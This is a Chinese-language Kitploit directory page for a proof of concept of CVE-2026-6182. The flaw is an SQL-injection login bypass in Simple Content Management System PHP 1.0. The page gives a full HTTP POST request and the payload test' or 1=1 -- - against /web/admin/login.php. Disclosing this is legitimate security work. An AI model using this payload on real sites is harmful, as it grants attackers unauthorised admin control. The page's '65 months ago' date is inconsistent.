Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-6182-SQLI-auth — 概念验证:针对 Simple Content Management System PHP 中 SQL 注入身份验证绕过的利用,允许未认证攻击者通过精心构造的 user 参数获取管理员访问权限。 | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

概念验证:针对 Simple Content Management System PHP 中 SQL 注入身份验证绕过的利用,允许未认证攻击者通过精心构造的 user 参数获取管理员访问权限。

查看仓库
65个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SQL 注入认证绕过 - 简单内容管理系统 PHP

描述

简单内容管理系统 PHP 的管理员登录页面存在 SQL 注入漏洞。user 参数在传入 SQL 查询之前未经过净化处理,允许未经认证的攻击者绕过认证并获得完整的管理员访问权限。


漏洞详情

  • 类型: SQL 注入(CWE-89)
  • 影响: 认证绕过,可获得完整的管理员访问权限
  • 受影响文件: /web/admin/login.php
  • 受影响参数: user
  • 攻击向量: 远程,未经认证 严重性: 严重

厂商

code-projects.org

产品

简单内容管理系统 PHP

版本

1.0


概念验证(PoC)

步骤 1 - 在 burp 中发送以下请求:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

或者直接在登录页面中添加 Screenshot 2026-04-05 051755

步骤 2 - 使用载荷的登录表单:

test' or 1=1 -- -

步骤 3 - 获得管理员面板访问权限:

Screenshot 2026-04-05 054510

影响

未经认证的远程攻击者可以在不知道任何凭据的情况下完全绕过管理员登录,获得对管理员面板的完全控制权,包括添加内容。


作者

Imad Alvi


参考

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

下载工具